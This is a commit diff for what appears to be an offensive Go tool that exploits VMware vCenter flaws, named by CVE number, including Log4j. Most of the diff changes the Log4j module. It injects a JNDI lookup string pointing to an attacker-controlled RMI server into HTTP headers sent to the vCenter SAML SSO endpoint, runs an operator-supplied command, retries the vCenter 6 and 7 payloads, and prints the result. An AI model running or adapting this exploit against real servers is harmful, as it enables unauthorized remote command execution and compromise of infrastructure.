v1.3.4 bug fix

go.mod

@@ -8,6 +8,7 @@ require (
 	github.com/cheekybits/genny v1.0.0 // indirect
 	github.com/fatih/color v1.13.0 // indirect
 	github.com/fsnotify/fsnotify v1.5.4 // indirect
+	github.com/go-resty/resty/v2 v2.7.0 // indirect
 	github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 // indirect
 	github.com/hashicorp/errwrap v1.1.0 // indirect
 	github.com/hashicorp/go-multierror v1.1.1 // indirect

go.sum

@@ -34,6 +34,8 @@ github.com/fsnotify/fsnotify v1.5.4/go.mod h1:OVB6XrOHzAwXMpEM7uPOzcehqUV2UqJxmV
 github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
 github.com/gliderlabs/ssh v0.1.1/go.mod h1:U7qILu1NlMHj9FlMhZLlkCdDnU1DBEAqr0aevW3Awn0=
 github.com/go-errors/errors v1.0.1/go.mod h1:f4zRHt4oKfwPJE5k8C9vpYG+aDHdBFUsgrm6/TyX73Q=
+github.com/go-resty/resty/v2 v2.7.0 h1:me+K9p3uhSmXtrBZ4k9jcEAfJmuC8IivWHwaLZwPrFY=
+github.com/go-resty/resty/v2 v2.7.0/go.mod h1:9PWDzw47qPphMRFfhsyk0NnSgvluHcljSMVIq3w7q0I=
 github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0 h1:p104kn46Q8WdvHunIJ9dAyjPVtrBPhSr3KT2yUst43I=
 github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0/go.mod h1:fyg7847qk6SyHyPtNmDHnmrv/HOrqktSC+C9fM+CJOE=
 github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
@@ -201,6 +203,7 @@ golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwY
 golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
 golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
 golang.org/x/net v0.0.0-20210428140749-89ef3d95e781/go.mod h1:OJAsFXCWl8Ukc7SiCT/9KSuxbyM7479/AVlXFRxuMCk=
+golang.org/x/net v0.0.0-20211029224645-99673261e6eb/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/net v0.0.0-20220624214902-1bab6f366d9e/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=
 golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c=

main.go

@@ -29,7 +29,7 @@ func usage() {
 	-u url
 		  you target, example: https://192.168.1.1
 	-m module
-		  you selected cve code, example: 21972 or 22205 or 21985 or log4center
+		  you selected cve code, example: 21972 or 22005 or 21985 or log4center
 	-c command
 		  you want execute command, example: "whoami"
 	-f filename
@@ -117,14 +117,7 @@ func main() {
 					usage()
 					os.Exit(0)
 				} else {
-					if log4jcenter.Exec_cmd(url, rmi, command, "6") {
-						//
-					} else {
-						fmt.Println("[-] Vcenter 6.X paylaod 利用失败，尝试7.0")
-						if !log4jcenter.Exec_cmd(url, rmi, command, "7") {
-							fmt.Println("[-] 回显失败，目标不存在漏洞或其他原因.")
-						}
-					}
+					log4jcenter.Execc(url, rmi, command)
 				}
 
 			} else {

src/log4jcenter/log4j.go

@@ -1,13 +1,17 @@
 package log4jcenter
 
 import (
+	"crypto/tls"
 	"fmt"
+	"io"
 	"net"
 	"os"
 	"strings"
 	"sync"
 	"time"
 
+	"github.com/go-resty/resty/v2"
+
 	"github.com/imroc/req/v3"
 )
 
@@ -127,12 +131,15 @@ func exploit(url, rmiserver string) {
 
 }
 
-func Exec_cmd(url, rmiserver, command, version string) bool {
+func exec_cmd(url, rmiserver, command, version string) (bool, string) {
 	host := rmiserver
 	client := req.C()
 	client.EnableForceHTTP1()
+	// client.DisableAutoReadResponse()
+	// client.SetUnixSocket("1.sock")
 	client.EnableInsecureSkipVerify()
-	client.SetTimeout(2 * time.Second)
+	client.DisableAutoReadResponse()
+	client.SetTimeout(4 * time.Second)
 	// client.SetProxyURL("http://127.0.0.1:8080") //尽量别用burp做代理，burp2022.8会启用http2，导致vcenter报错403
 	rmi_server := ""
 	cmd := ""
@@ -143,7 +150,7 @@ func Exec_cmd(url, rmiserver, command, version string) bool {
 		rmi_server = fmt.Sprintf("${jndi:%s/TomcatBypass/TomcatEcho}", host)
 		cmd = command + ";echo 'nmsl'"
 	}
-
+	_ = cmd
 	myheader := map[string]string{
 		"User-Agent":                "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0",
 		"Accept":                    "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
@@ -157,32 +164,56 @@ func Exec_cmd(url, rmiserver, command, version string) bool {
 		"Cmd":                       cmd,
 	}
 
-	resp, err := client.R().
+	cli := resty.New().SetTLSClientConfig(&tls.Config{InsecureSkipVerify: true})
+
+	resp, err := cli.R().
+		EnableTrace().
 		SetHeaders(myheader).
 		Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")
-	if err != nil && strings.Contains(err.Error(), "EOF") {
-		//
-	} else if err == nil {
-
-		// log.Fatal(err)
+	_ = err
+	// fmt.Println(resp.String())
 
+	// resp, err := client.R().
+	// 	SetHeaders(myheader).
+	// 	Get(url + "/websso/SAML2/SSO/vsphere.local?SAMLRequest=")
+	if err != nil && err == io.ErrUnexpectedEOF {
+		//
+	} else if strings.Contains(err.Error(), "NO_ERROR") {
+		//
 	} else {
 		fmt.Println("[-] 连接失败，请检查网络.")
 		os.Exit(0)
 	}
-	if resp.StatusCode == 200 {
+	if resp.StatusCode() == 200 {
 		result := resp.String()
 		result = strings.Split(result, "nmsl")[0]
 		result = strings.TrimRight(result, "\n")
-		fmt.Println(result)
-		return true
+		// fmt.Println(resp.String())
+		// fmt.Println(result)
+		// fmt.Println(1)
+		return true, result
 	} else {
 
-		return false
+		return false, ""
 	}
 
 }
 
+func Execc(url, rmiserver, command string) {
+	for i := 0; i < 5; i++ {
+		temp1, temp2 := exec_cmd(url, rmiserver, command, "7")
+		if temp1 {
+			fmt.Println(temp2)
+			break
+		}
+		temp3, temp4 := exec_cmd(url, rmiserver, command, "6")
+		if temp3 {
+			fmt.Println(temp4)
+			break
+		}
+	}
+}
+
 func getIpAddr2(url string) string {
 
 	tmp := strings.Split(url, ":")